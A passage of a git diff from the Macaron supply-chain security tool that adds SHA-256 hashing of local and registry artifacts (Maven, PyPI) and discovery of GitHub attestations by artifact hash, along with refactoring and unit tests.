+ +def get_local_artifact_hash(purl: PackageURL, artifact_dirs: list[str]) -> str | None: + """Compute the hash of the local artifact. + + Parameters + ---------- + purl: PackageURL + The PURL of the artifact being sought. + artifact_dirs: list[str] + The list of directories that may contain the artifact file. + + Returns + ------- + str | None + The hash, or None if not found. + """ + if not artifact_dirs: + logger.debug("No artifact directories provided.") + return None + + if not purl.version: + logger.debug("PURL is missing version.") + return None + + artifact_target = None + if purl.type == "maven": + artifact_target = construct_primary_jar_file_name(purl) + + # TODO add support for other PURL types here. + # Other purl types can be easily supported if user provided artifacts are accepted from the command line. + # See https://github.com/oracle/macaron/issues/498. 
+ + if not artifact_target: + logger.debug("PURL type not supported: %s", purl.type) + return None + + for artifact_dir in artifact_dirs: + full_path = os.path.join(artifact_dir, artifact_target) + if not os.path.exists(full_path): + continue + + with open(full_path, "rb") as file: + try: + hash_result = hashlib.file_digest(file, "sha256") + except ValueError as error: + logger.debug("Error while hashing file: %s", error) + continue + + return hash_result.hexdigest() + + return None diff --git a/src/macaron/artifact/maven.py b/src/macaron/artifact/maven.py index dd97431f7..8b9b0721c 100644 --- a/src/macaron/artifact/maven.py +++ b/src/macaron/artifact/maven.py @@ -1,4 +1,4 @@ -# Copyright (c) 2024 - 2024, Oracle and/or its affiliates. All rights reserved. +# Copyright (c) 2024 - 2025, Oracle and/or its affiliates. All rights reserved. # Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. """This module declares types and utilities for Maven artifacts.""" @@ -196,3 +196,22 @@ def construct_maven_repository_path( if asset_name: path = "/".join([path, asset_name]) return path + + +def construct_primary_jar_file_name(purl: PackageURL) -> str | None: + """Return the name of the primary JAR for the passed PURL based on the Maven registry standard. + + Parameters + ---------- + purl: PackageURL + The PURL of the artifact. + + Returns + ------- + str | None + The artifact file name, or None if invalid. 
+ """ + if not purl.version: + return None + + return purl.name + "-" + purl.version + ".jar" diff --git a/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/suspicious_setup.py b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/suspicious_setup.py index 89d1909a3..ebde2a21f 100644 --- a/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/suspicious_setup.py +++ b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/suspicious_setup.py @@ -59,7 +59,7 @@ def _get_setup_source_code(self, pypi_package_json: PyPIPackageJsonAsset) -> str response = requests.get(sourcecode_url, stream=True, timeout=40) response.raise_for_status() except requests.exceptions.HTTPError as http_err: - logger.debug("HTTP error occurred: %s", http_err) + logger.debug("HTTP error occurred when trying to download source: %s", http_err) return None if response.status_code != 200: diff --git a/src/macaron/repo_finder/repo_finder.py b/src/macaron/repo_finder/repo_finder.py index e6c026554..9017a4ae0 100644 --- a/src/macaron/repo_finder/repo_finder.py +++ b/src/macaron/repo_finder/repo_finder.py @@ -166,7 +166,12 @@ def find_repo_alternative( found_repo, outcome = repo_finder_pypi.find_repo(purl, package_registries_info) if not found_repo: - logger.debug("Could not find repository using type specific (%s) methods for PURL: %s", purl.type, purl) + logger.debug( + "Could not find repository using type specific (%s) methods for PURL %s. 
Outcome: %s", + purl.type, + purl, + outcome, + ) return found_repo, outcome diff --git a/src/macaron/repo_finder/repo_finder_pypi.py b/src/macaron/repo_finder/repo_finder_pypi.py index b11f9cbe6..c0c273154 100644 --- a/src/macaron/repo_finder/repo_finder_pypi.py +++ b/src/macaron/repo_finder/repo_finder_pypi.py @@ -9,7 +9,7 @@ from macaron.repo_finder.repo_finder_enums import RepoFinderInfo from macaron.repo_finder.repo_validator import find_valid_repository_url from macaron.slsa_analyzer.package_registry import PACKAGE_REGISTRIES, PyPIRegistry -from macaron.slsa_analyzer.package_registry.pypi_registry import PyPIPackageJsonAsset +from macaron.slsa_analyzer.package_registry.pypi_registry import PyPIPackageJsonAsset, find_or_create_pypi_asset from macaron.slsa_analyzer.specs.package_registry_spec import PackageRegistryInfo logger: logging.Logger = logging.getLogger(__name__) @@ -44,38 +44,29 @@ def find_repo( ), None, ) + if not pypi_info: + return "", RepoFinderInfo.PYPI_NO_REGISTRY - if not pypi_info or not isinstance(pypi_info.package_registry, PyPIRegistry): - pypi_registry = next((registry for registry in PACKAGE_REGISTRIES if isinstance(registry, PyPIRegistry)), None) - else: - pypi_registry = pypi_info.package_registry - - if not pypi_registry: - logger.debug("PyPI package registry not available.") - return "", RepoFinderInfo.PYPI_NO_REGISTRY + if not purl.version: + return "", RepoFinderInfo.NO_VERSION_PROVIDED - pypi_asset = None - from_metadata = False + # Create the asset. if pypi_info: - for existing_asset in pypi_info.metadata: - if not isinstance(existing_asset, PyPIPackageJsonAsset): - continue - - if existing_asset.component_name == purl.name: - pypi_asset = existing_asset - from_metadata = True - break + pypi_asset = find_or_create_pypi_asset(purl.name, purl.version, pypi_info) + else: + # If this function has been reached via find-source, we do not store the asset. 
+ pypi_registry = next((registry for registry in PACKAGE_REGISTRIES if isinstance(registry, PyPIRegistry)), None) + if not pypi_registry: + return "", RepoFinderInfo.PYPI_NO_REGISTRY + pypi_asset = PyPIPackageJsonAsset(purl.name, purl.version, False, pypi_registry, {}, "") if not pypi_asset: - pypi_asset = PyPIPackageJsonAsset(purl.name, purl.version, False, pypi_registry, {}, "") + # This should be unreachable, as the pypi_registry has already been confirmed to be of type PyPIRegistry. + return "", RepoFinderInfo.PYPI_NO_REGISTRY if not pypi_asset.package_json and not pypi_asset.download(dest=""): return "", RepoFinderInfo.PYPI_HTTP_ERROR - if not from_metadata and pypi_info: - # Save the asset for later use. - pypi_info.metadata.append(pypi_asset) - url_dict = pypi_asset.get_project_links() if not url_dict: return "", RepoFinderInfo.PYPI_JSON_ERROR diff --git a/src/macaron/slsa_analyzer/analyzer.py b/src/macaron/slsa_analyzer/analyzer.py index 8fd2e5f83..23a252c97 100644 --- a/src/macaron/slsa_analyzer/analyzer.py +++ b/src/macaron/slsa_analyzer/analyzer.py @@ -20,7 +20,10 @@ from sqlalchemy.orm import Session from macaron import __version__ -from macaron.artifact.local_artifact import get_local_artifact_dirs +from macaron.artifact.local_artifact import ( + get_local_artifact_dirs, + get_local_artifact_hash, +) from macaron.config.global_config import global_config from macaron.config.target_config import Configuration from macaron.database.database_manager import DatabaseManager, get_db_manager, get_db_session @@ -41,6 +44,7 @@ ProvenanceError, PURLNotFoundError, ) +from macaron.json_tools import json_extract from macaron.output_reporter.reporter import FileReporter from macaron.output_reporter.results import Record, Report, SCMStatus from macaron.provenance import provenance_verifier @@ -66,12 +70,19 @@ from macaron.slsa_analyzer.checks import * # pylint: disable=wildcard-import,unused-wildcard-import # noqa: F401,F403 from macaron.slsa_analyzer.ci_service 
import CI_SERVICES from macaron.slsa_analyzer.database_store import store_analyze_context_to_db -from macaron.slsa_analyzer.git_service import GIT_SERVICES, BaseGitService +from macaron.slsa_analyzer.git_service import GIT_SERVICES, BaseGitService, GitHub from macaron.slsa_analyzer.git_service.base_git_service import NoneGitService from macaron.slsa_analyzer.git_url import GIT_REPOS_DIR -from macaron.slsa_analyzer.package_registry import PACKAGE_REGISTRIES +from macaron.slsa_analyzer.package_registry import PACKAGE_REGISTRIES, MavenCentralRegistry, PyPIRegistry +from macaron.slsa_analyzer.package_registry.pypi_registry import find_or_create_pypi_asset from macaron.slsa_analyzer.provenance.expectations.expectation_registry import ExpectationRegistry -from macaron.slsa_analyzer.provenance.intoto import InTotoPayload, InTotoV01Payload +from macaron.slsa_analyzer.provenance.intoto import ( + InTotoPayload, + InTotoV01Payload, + ValidateInTotoPayloadError, + validate_intoto_payload, +) +from macaron.slsa_analyzer.provenance.loader import decode_provenance from macaron.slsa_analyzer.provenance.slsa import SLSAProvenanceData from macaron.slsa_analyzer.registry import registry from macaron.slsa_analyzer.specs.ci_spec import CIInfo @@ -414,6 +425,17 @@ def run_single( status=SCMStatus.ANALYSIS_FAILED, ) + local_artifact_dirs = None + if parsed_purl and parsed_purl.type in self.local_artifact_repo_mapper: + local_artifact_repo_path = self.local_artifact_repo_mapper[parsed_purl.type] + try: + local_artifact_dirs = get_local_artifact_dirs( + purl=parsed_purl, + local_artifact_repo_path=local_artifact_repo_path, + ) + except LocalArtifactFinderError as error: + logger.debug(error) + # Prepare the repo. 
git_obj = None commit_finder_outcome = CommitFinderInfo.NOT_USED @@ -491,6 +513,14 @@ def run_single( git_service = self._determine_git_service(analyze_ctx) self._determine_ci_services(analyze_ctx, git_service) self._determine_build_tools(analyze_ctx, git_service) + + # Try to find an attestation from GitHub, if applicable. + if parsed_purl and not provenance_payload and analysis_target.repo_path and isinstance(git_service, GitHub): + # Try to discover GitHub attestation for the target software component. + artifact_hash = self.get_artifact_hash(parsed_purl, local_artifact_dirs, package_registries_info) + if artifact_hash: + provenance_payload = self.get_github_attestation_payload(analyze_ctx, git_service, artifact_hash) + if parsed_purl is not None: self._verify_repository_link(parsed_purl, analyze_ctx) self._determine_package_registries(analyze_ctx, package_registries_info) @@ -556,16 +586,8 @@ def run_single( analyze_ctx.dynamic_data["analyze_source"] = analyze_source analyze_ctx.dynamic_data["force_analyze_source"] = force_analyze_source - if parsed_purl and parsed_purl.type in self.local_artifact_repo_mapper: - local_artifact_repo_path = self.local_artifact_repo_mapper[parsed_purl.type] - try: - local_artifact_dirs = get_local_artifact_dirs( - purl=parsed_purl, - local_artifact_repo_path=local_artifact_repo_path, - ) - analyze_ctx.dynamic_data["local_artifact_paths"].extend(local_artifact_dirs) - except LocalArtifactFinderError as error: - logger.debug(error) + if local_artifact_dirs: + analyze_ctx.dynamic_data["local_artifact_paths"].extend(local_artifact_dirs) analyze_ctx.check_results = registry.scan(analyze_ctx) @@ -955,6 +977,144 @@ def create_analyze_ctx(self, component: Component) -> AnalyzeContext: return analyze_ctx + def get_artifact_hash( + self, + purl: PackageURL, + local_artifact_dirs: list[str] | None, + package_registries_info: list[PackageRegistryInfo], + ) -> str | None: + """Get the hash of the artifact found from the passed PURL using local 
or remote files. + + Provided local caches will be searched first. Artifacts will be downloaded if nothing is found within local + caches, or if no appropriate cache is provided for the target language. + Downloaded artifacts will be added to the passed package registry to prevent downloading them again. + + Parameters + ---------- + purl: PackageURL + The PURL of the artifact. + local_artifact_dirs: list[str] | None + The list of directories that may contain the artifact file. + package_registries_info: list[PackageRegistryInfo] + The list of package registry information. + + Returns + ------- + str | None + The hash of the artifact, or None if no artifact can be found locally or remotely. + """ + if local_artifact_dirs: + # Try to get the hash from a local file. + artifact_hash = get_local_artifact_hash(purl, local_artifact_dirs) + + if artifact_hash: + return artifact_hash + + # Download the artifact. + if purl.type == "maven": + maven_registry = next( + ( + package_registry + for package_registry in PACKAGE_REGISTRIES + if isinstance(package_registry, MavenCentralRegistry) + ), + None, + ) + if not maven_registry: + return None + + return maven_registry.get_artifact_hash(purl) + + if purl.type == "pypi": + pypi_registry = next( + ( + package_registry + for package_registry in PACKAGE_REGISTRIES + if isinstance(package_registry, PyPIRegistry) + ), + None, + ) + if not pypi_registry: + logger.debug("Missing registry for PyPI") + return None + + registry_info = next( + ( + info + for info in package_registries_info + if info.package_registry == pypi_registry and info.build_tool_name in {"pip", "poetry"} + ), + None, + ) + if not registry_info: + logger.debug("Missing registry information for PyPI") + return None + + if not purl.version: + return None + + pypi_asset = find_or_create_pypi_asset(purl.name, purl.version, registry_info) + if not pypi_asset: + return None + + pypi_asset.has_repository = True + if not pypi_asset.download(""): + return None + + 
artifact_hash = pypi_asset.get_sha256() + if artifact_hash: + return artifact_hash + + source_url = pypi_asset.get_sourcecode_url("bdist_wheel") + if not source_url: + return None + + return pypi_registry.get_artifact_hash(source_url) + + logger.debug("Purl type '%s' not yet supported for GitHub attestation discovery.", purl.type) + return None + + def get_github_attestation_payload( + self, analyze_ctx: AnalyzeContext, git_service: GitHub, artifact_hash: str + ) -> InTotoPayload | None: + """Get the GitHub attestation associated with the given PURL, or None if it cannot be found. + + The schema of GitHub attestation can be found on the API page: + https://docs.github.com/en/rest/repos/repos?apiVersion=2022-11-28#list-attestations + + Parameters + ---------- + analyze_ctx: AnalyzeContext + The analysis context. + git_service: GitHub + The Git service to retrieve the attestation from. + artifact_hash: str + The hash of the related artifact. + + Returns + ------- + InTotoPayload | None + The attestation payload, if found. 
+ """ + git_attestation_dict = git_service.api_client.get_attestation( + analyze_ctx.component.repository.full_name, artifact_hash + ) + + if not git_attestation_dict: + return None + + git_attestation_list = json_extract(git_attestation_dict, ["attestations"], list) + if not git_attestation_list: + return None + + payload = decode_provenance(git_attestation_list[0]) + + try: + return validate_intoto_payload(payload) + except ValidateInTotoPayloadError as error: + logger.debug("Invalid attestation payload: %s", error) + return None + def _determine_git_service(self, analyze_ctx: AnalyzeContext) -> BaseGitService: """Determine the Git service used by the software component.""" remote_path = analyze_ctx.component.repository.remote_path if analyze_ctx.component.repository else None diff --git a/src/macaron/slsa_analyzer/checks/build_script_check.py b/src/macaron/slsa_analyzer/checks/build_script_check.py index 44f675ce4..ccd61cca1 100644 --- a/src/macaron/slsa_analyzer/checks/build_script_check.py +++ b/src/macaron/slsa_analyzer/checks/build_script_check.py @@ -27,10 +27,6 @@ class BuildScriptFacts(CheckFacts): __tablename__ = "_build_script_check" - # This check is disabled here due to a bug in pylint. The Mapped class triggers a false positive. - # It may arbitrarily become true that this is no longer needed in this check, or will be needed in another check. - # pylint: disable=unsubscriptable-object - #: The primary key. 
id: Mapped[int] = mapped_column(ForeignKey("_check_facts.id"), primary_key=True) # noqa: A003 diff --git a/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py b/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py index a7d32fc18..80a53d610 100644 --- a/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py +++ b/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py @@ -34,7 +34,11 @@ from macaron.slsa_analyzer.checks.check_result import CheckResultData, CheckResultType, Confidence, JustificationType from macaron.slsa_analyzer.package_registry.deps_dev import APIAccessError, DepsDevService from macaron.slsa_analyzer.package_registry.osv_dev import OSVDevService -from macaron.slsa_analyzer.package_registry.pypi_registry import PyPIPackageJsonAsset, PyPIRegistry +from macaron.slsa_analyzer.package_registry.pypi_registry import ( + PyPIPackageJsonAsset, + PyPIRegistry, + find_or_create_pypi_asset, +) from macaron.slsa_analyzer.registry import registry from macaron.slsa_analyzer.specs.package_registry_spec import PackageRegistryInfo @@ -280,29 +284,16 @@ def run_check(self, ctx: AnalyzeContext) -> CheckResultData: case PackageRegistryInfo( build_tool_name="pip" | "poetry", build_tool_purl_type="pypi", - package_registry=PyPIRegistry() as pypi_registry, + package_registry=PyPIRegistry(), ) as pypi_registry_info: - # Retrieve the pre-existing AssetLocator object for the PyPI package JSON object, if it exists. - pypi_package_json = next( - ( - asset - for asset in pypi_registry_info.metadata - if isinstance(asset, PyPIPackageJsonAsset) - and asset.component_name == ctx.component.name - and asset.component_version == ctx.component.version - ), - None, + # Retrieve the pre-existing asset, or create a new one. + pypi_package_json = find_or_create_pypi_asset( + ctx.component.name, ctx.component.version, pypi_registry_info ) if not pypi_package_json: - # Create an AssetLocator object for the PyPI package JSON object. 
- pypi_package_json = PyPIPackageJsonAsset( - component_name=ctx.component.name, - component_version=ctx.component.version, - has_repository=ctx.component.repository is not None, - pypi_registry=pypi_registry, - package_json={}, - package_sourcecode_path="", - ) + return CheckResultData(result_tables=[], result_type=CheckResultType.UNKNOWN) + + pypi_package_json.has_repository = ctx.component.repository is not None pypi_registry_info.metadata.append(pypi_package_json) diff --git a/src/macaron/slsa_analyzer/checks/provenance_commit_check.py b/src/macaron/slsa_analyzer/checks/provenance_commit_check.py index 61fb6b8a3..b2b5d7297 100644 --- a/src/macaron/slsa_analyzer/checks/provenance_commit_check.py +++ b/src/macaron/slsa_analyzer/checks/provenance_commit_check.py @@ -22,10 +22,6 @@ class ProvenanceDerivedCommitFacts(CheckFacts): __tablename__ = "_provenance_derived_commit_check" - # This check is disabled here due to a bug in pylint. The Mapped class triggers a false positive. - # It may arbitrarily become true that this is no longer needed in this check, or will be needed in another check. - # pylint: disable=unsubscriptable-object - #: The primary key. id: Mapped[int] = mapped_column(ForeignKey("_check_facts.id"), primary_key=True) # noqa: A003 diff --git a/src/macaron/slsa_analyzer/checks/provenance_repo_check.py b/src/macaron/slsa_analyzer/checks/provenance_repo_check.py index 063e68c2b..1f35fef39 100644 --- a/src/macaron/slsa_analyzer/checks/provenance_repo_check.py +++ b/src/macaron/slsa_analyzer/checks/provenance_repo_check.py @@ -22,6 +22,10 @@ class ProvenanceDerivedRepoFacts(CheckFacts): __tablename__ = "_provenance_derived_repo_check" + # This check is disabled here due to a bug in pylint. The Mapped class triggers a false positive. + # It may arbitrarily become true that this is no longer needed in this check, or will be needed in another check. + # pylint: disable=unsubscriptable-object + #: The primary key. 
id: Mapped[int] = mapped_column(ForeignKey("_check_facts.id"), primary_key=True) # noqa: A003 diff --git a/src/macaron/slsa_analyzer/git_service/api_client.py b/src/macaron/slsa_analyzer/git_service/api_client.py index 8e987e6ca..681a1f4e0 100644 --- a/src/macaron/slsa_analyzer/git_service/api_client.py +++ b/src/macaron/slsa_analyzer/git_service/api_client.py @@ -1,4 +1,4 @@ -# Copyright (c) 2022 - 2024, Oracle and/or its affiliates. All rights reserved. +# Copyright (c) 2022 - 2025, Oracle and/or its affiliates. All rights reserved. # Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. """The module provides API clients for VCS services, such as GitHub.""" @@ -659,6 +659,25 @@ def download_asset(self, url: str, download_path: str) -> bool: return True + def get_attestation(self, full_name: str, artifact_hash: str) -> dict: + """Download and return the attestation associated with the passed artifact hash, if any. + + Parameters + ---------- + full_name : str + The full name of the repo. + artifact_hash: str + The SHA256 hash of an artifact. + + Returns + ------- + dict + The attestation data, or an empty dict if not found. + """ + url = f"{GhAPIClient._REPO_END_POINT}/{full_name}/attestations/sha256:{artifact_hash}" + response_data = send_get_http(url, self.headers) + return response_data or {} + def get_default_gh_client(access_token: str) -> GhAPIClient: """Return a GhAPIClient instance with default values. diff --git a/src/macaron/slsa_analyzer/package_registry/maven_central_registry.py b/src/macaron/slsa_analyzer/package_registry/maven_central_registry.py index 131051b66..2fe3c5cea 100644 --- a/src/macaron/slsa_analyzer/package_registry/maven_central_registry.py +++ b/src/macaron/slsa_analyzer/package_registry/maven_central_registry.py @@ -2,14 +2,16 @@ # Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. 
"""The module provides abstractions for the Maven Central package registry.""" - +import hashlib import logging import urllib.parse from datetime import datetime, timezone import requests from packageurl import PackageURL +from requests import RequestException +from macaron.artifact.maven import construct_maven_repository_path, construct_primary_jar_file_name from macaron.config.defaults import defaults from macaron.errors import ConfigurationError, InvalidHTTPResponseError from macaron.slsa_analyzer.package_registry.package_registry import PackageRegistry @@ -236,3 +238,82 @@ def find_publish_timestamp(self, purl: str) -> datetime: raise InvalidHTTPResponseError(f"The timestamp returned by {url} is invalid") from error raise InvalidHTTPResponseError(f"Invalid response from Maven central for {url}.") + + def get_artifact_hash(self, purl: PackageURL) -> str | None: + """Return the hash of the artifact found by the passed purl relevant to the registry's URL. + + An artifact's URL will be as follows: + {registry_url}/{artifact_path}/{file_name} + Where: + - {registry_url} is determined by the setup/config of the registry. + - {artifact_path} is determined by the Maven repository layout. + (See: https://maven.apache.org/repository/layout.html and + https://maven.apache.org/guides/mini/guide-naming-conventions.html) + - {file_name} is {purl.name}-{purl.version}.jar (For a JAR artefact) + + Example + ------- + PURL: pkg:maven/com.experlog/xapool@1.5.0 + URL: https://repo1.maven.org/maven2/com/experlog/xapool/1.5.0/xapool-1.5.0.jar + + Parameters + ---------- + purl: PackageURL + The purl of the artifact. + + Returns + ------- + str | None + The hash of the artifact, or None if not found. + """ + if not purl.namespace: + return None + + file_name = construct_primary_jar_file_name(purl) + if not (purl.version and file_name): + return None + + # Maven supports but does not require a sha256 hash of uploaded artifacts. 
+ artifact_path = construct_maven_repository_path(purl.namespace, purl.name, purl.version) + artifact_url = self.registry_url + "/" + artifact_path + "/" + file_name + artifact_sha256_url = artifact_url + ".sha256" + logger.debug("Search for artifact hash using URL: %s", [artifact_sha256_url, artifact_url]) + + response = send_get_http_raw(artifact_sha256_url, {}) + retrieved_artifact_hash = None + if response and (retrieved_artifact_hash := response.text): + # As Maven hashes are user provided and not verified they serve as a reference only. + logger.debug("Found hash of artifact: %s", retrieved_artifact_hash) + + try: + response = requests.get(artifact_url, stream=True, timeout=40) + response.raise_for_status() + except requests.exceptions.HTTPError as http_err: + logger.debug("HTTP error occurred when trying to download artifact: %s", http_err) + return None + + if response.status_code != 200: + return None + + # Download file and compute hash as chunks are received. + hash_algorithm = hashlib.sha256() + try: + for chunk in response.iter_content(): + hash_algorithm.update(chunk) + except RequestException as error: + # Something went wrong with the request, abort. 
+ logger.debug("Error while streaming target file: %s", error) + response.close() + return None + + computed_artifact_hash: str = hash_algorithm.hexdigest() + if retrieved_artifact_hash and computed_artifact_hash != retrieved_artifact_hash: + logger.debug( + "Artifact hash and discovered hash do not match: %s != %s", + computed_artifact_hash, + retrieved_artifact_hash, + ) + return None + + logger.debug("Computed hash of artifact: %s", computed_artifact_hash) + return computed_artifact_hash diff --git a/src/macaron/slsa_analyzer/package_registry/package_registry.py b/src/macaron/slsa_analyzer/package_registry/package_registry.py index 9e71fc595..ca0adfa62 100644 --- a/src/macaron/slsa_analyzer/package_registry/package_registry.py +++ b/src/macaron/slsa_analyzer/package_registry/package_registry.py @@ -7,9 +7,9 @@ from abc import ABC, abstractmethod from datetime import datetime -from macaron.errors import InvalidHTTPResponseError +from macaron.errors import APIAccessError, InvalidHTTPResponseError from macaron.json_tools import json_extract -from macaron.slsa_analyzer.package_registry.deps_dev import APIAccessError, DepsDevService +from macaron.slsa_analyzer.package_registry.deps_dev import DepsDevService logger: logging.Logger = logging.getLogger(__name__) diff --git a/src/macaron/slsa_analyzer/package_registry/pypi_registry.py b/src/macaron/slsa_analyzer/package_registry/pypi_registry.py index 2c6af515c..13156f7f7 100644 --- a/src/macaron/slsa_analyzer/package_registry/pypi_registry.py +++ b/src/macaron/slsa_analyzer/package_registry/pypi_registry.py @@ -2,7 +2,9 @@ # Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. 
"""The module provides abstractions for the pypi package registry.""" +from __future__ import annotations +import hashlib import logging import os import re @@ -14,6 +16,7 @@ from contextlib import contextmanager from dataclasses import dataclass from datetime import datetime +from typing import TYPE_CHECKING import requests from bs4 import BeautifulSoup, Tag @@ -26,6 +29,9 @@ from macaron.slsa_analyzer.package_registry.package_registry import PackageRegistry from macaron.util import send_get_http_raw +if TYPE_CHECKING: + from macaron.slsa_analyzer.specs.package_registry_spec import PackageRegistryInfo + logger: logging.Logger = logging.getLogger(__name__) @@ -263,6 +269,44 @@ def download_package_sourcecode(self, url: str) -> str: logger.debug("Temporary download and unzip of %s stored in %s", file_name, temp_dir) return temp_dir + def get_artifact_hash(self, artifact_url: str) -> str | None: + """Return the hash of the artifact found at the passed URL. + + Parameters + ---------- + artifact_url + The URL of the artifact. + + Returns + ------- + str | None + The hash of the artifact, or None if not found. + """ + try: + response = requests.get(artifact_url, stream=True, timeout=40) + response.raise_for_status() + except requests.exceptions.HTTPError as http_err: + logger.debug("HTTP error occurred when trying to download artifact: %s", http_err) + return None + + if response.status_code != 200: + logger.debug("Invalid response: %s", response.status_code) + return None + + hash_algorithm = hashlib.sha256() + try: + for chunk in response.iter_content(): + hash_algorithm.update(chunk) + except RequestException as error: + # Something went wrong with the request, abort. 
+ logger.debug("Error while streaming source file: %s", error) + response.close() + return None + + artifact_hash: str = hash_algorithm.hexdigest() + logger.debug("Computed artifact hash: %s", artifact_hash) + return artifact_hash + def get_package_page(self, package_name: str) -> str | None: """Implement custom API to get package main page. @@ -499,15 +543,19 @@ def get_latest_version(self) -> str | None: """ return json_extract(self.package_json, ["info", "version"], str) - def get_sourcecode_url(self) -> str | None: + def get_sourcecode_url(self, package_type: str = "sdist") -> str | None: """Get the url of the source distribution. + Parameters + ---------- + package_type: str + The package type to retrieve the URL of. + Returns ------- str | None The URL of the source distribution. """ - urls: list | None = None if self.component_version: urls = json_extract(self.package_json, ["releases", self.component_version], list) else: @@ -516,7 +564,7 @@ def get_sourcecode_url(self) -> str | None: if not urls: return None for distribution in urls: - if distribution.get("packagetype") != "sdist": + if distribution.get("packagetype") != package_type: continue # We intentionally check if the url is None and use empty string if that's the case. source_url: str = distribution.get("url") or "" @@ -670,3 +718,64 @@ def iter_sourcecode(self) -> Iterator[tuple[str, bytes]]: contents = handle.read() yield filepath, contents + + def get_sha256(self) -> str | None: + """Get the sha256 hash of the artifact from its payload. + + Returns + ------- + str | None + The sha256 hash of the artifact, or None if not found. 
+ """ + if not self.package_json and not self.download(""): + return None + + if not self.component_version: + artifact_hash = json_extract(self.package_json, ["urls", 0, "digests", "sha256"], str) + else: + artifact_hash = json_extract( + self.package_json, ["releases", self.component_version, 0, "digests", "sha256"], str + ) + logger.debug("Found sha256 hash: %s", artifact_hash) + return artifact_hash + + +def find_or_create_pypi_asset( + asset_name: str, asset_version: str | None, pypi_registry_info: PackageRegistryInfo +) -> PyPIPackageJsonAsset | None: + """Find the matching asset in the provided package registry information, or if not found, create and add it. + + Parameters + ---------- + asset_name: str + The name of the asset. + asset_version: str | None + The version of the asset. + pypi_registry_info: + The package registry information. If a new asset is created, it will be added to the metadata of this registry. + + Returns + ------- + PyPIPackageJsonAsset | None + The asset, or None if not found. 
+ """ + asset = next( + ( + asset + for asset in pypi_registry_info.metadata + if isinstance(asset, PyPIPackageJsonAsset) and asset.component_name == asset_name + ), + None, + ) + + if asset: + return asset + + package_registry = pypi_registry_info.package_registry + if not isinstance(package_registry, PyPIRegistry): + logger.debug("Failed to create PyPIPackageJson asset.") + return None + + asset = PyPIPackageJsonAsset(asset_name, asset_version, False, package_registry, {}, "") + pypi_registry_info.metadata.append(asset) + return asset diff --git a/src/macaron/slsa_analyzer/provenance/loader.py b/src/macaron/slsa_analyzer/provenance/loader.py index 19c256315..106cc03b5 100644 --- a/src/macaron/slsa_analyzer/provenance/loader.py +++ b/src/macaron/slsa_analyzer/provenance/loader.py @@ -80,15 +80,33 @@ def _load_provenance_file_content( try: decompressed_file_content = gzip.decompress(file_content) decoded_file_content = decompressed_file_content.decode() - provenance = json.loads(decoded_file_content) + return decode_provenance(json.loads(decoded_file_content)) except (gzip.BadGzipFile, EOFError, zlib.error): decoded_file_content = file_content.decode() - provenance = json.loads(decoded_file_content) + return decode_provenance(json.loads(decoded_file_content)) except (json.JSONDecodeError, TypeError, UnicodeDecodeError) as error: raise LoadIntotoAttestationError( "Cannot deserialize the file content as JSON.", ) from error + +def decode_provenance(provenance: dict) -> dict[str, JsonType]: + """Find and decode the provenance payload. + + Parameters + ---------- + provenance: dict + The contents of the provenance from which the payload will be decoded. + + Returns + ------- + The decoded payload. + + Raises + ------ + LoadIntotoAttestationError + If the payload could not be decoded. + """ # The GitHub Attestation stores the DSSE envelope in `dsseEnvelope` property. 
dsse_envelope = provenance.get("dsseEnvelope", None) if dsse_envelope: @@ -101,6 +119,10 @@ def _load_provenance_file_content( if not provenance_payload: # PyPI Attestation. provenance_payload = json_extract(provenance, ["envelope", "statement"], str) + if not provenance_payload: + # GitHub Attestation. + # TODO Check if old method (above) actually works. + provenance_payload = json_extract(provenance, ["bundle", "dsseEnvelope", "payload"], str) if not provenance_payload: raise LoadIntotoAttestationError( 'Cannot find the "payload" field in the decoded provenance.', diff --git a/tests/artifact/test_local_artifact.py b/tests/artifact/test_local_artifact.py index 1468bef42..3124afc3c 100644 --- a/tests/artifact/test_local_artifact.py +++ b/tests/artifact/test_local_artifact.py @@ -15,7 +15,9 @@ construct_local_artifact_dirs_glob_pattern_pypi_purl, find_artifact_dirs_from_python_venv, get_local_artifact_dirs, + get_local_artifact_hash, ) +from macaron.artifact.maven import construct_primary_jar_file_name from macaron.errors import LocalArtifactFinderError @@ -249,3 +251,21 @@ def test_get_local_artifact_paths_succeeded_pypi(tmp_path: Path) -> None: ) assert sorted(result) == sorted(pypi_artifact_paths) + + +def test_get_local_artifact_hash() -> None: + """Test the get local artifact hash function.""" + artifact_purl = PackageURL.from_string("pkg:maven/test/test@1") + artifact_jar_name = construct_primary_jar_file_name(artifact_purl) + + assert artifact_jar_name + + with tempfile.TemporaryDirectory() as temp_dir: + artifact_path = os.path.join(temp_dir, artifact_jar_name) + with open(artifact_path, "w", encoding="utf8") as file: + file.write("1") + + # A file containing: "1". 
+ target_hash = "6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b" + + assert target_hash == get_local_artifact_hash(artifact_purl, [temp_dir]) diff --git a/tests/artifact/test_maven.py b/tests/artifact/test_maven.py index 6014c20ad..b39856e4e 100644 --- a/tests/artifact/test_maven.py +++ b/tests/artifact/test_maven.py @@ -1,4 +1,4 @@ -# Copyright (c) 2024 - 2024, Oracle and/or its affiliates. All rights reserved. +# Copyright (c) 2024 - 2025, Oracle and/or its affiliates. All rights reserved. # Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. """Tests for types and utilities for Maven artifacts.""" @@ -6,7 +6,11 @@ import pytest from packageurl import PackageURL -from macaron.artifact.maven import MavenSubjectPURLMatcher, construct_maven_repository_path +from macaron.artifact.maven import ( + MavenSubjectPURLMatcher, + construct_maven_repository_path, + construct_primary_jar_file_name, +) from macaron.slsa_analyzer.provenance.intoto import InTotoPayload, validate_intoto_payload @@ -161,3 +165,10 @@ def test_to_group_folder_path( ) -> None: """Test the ``to_gorup_folder_path`` method.""" assert construct_maven_repository_path(group_id) == expected_group_path + + +def 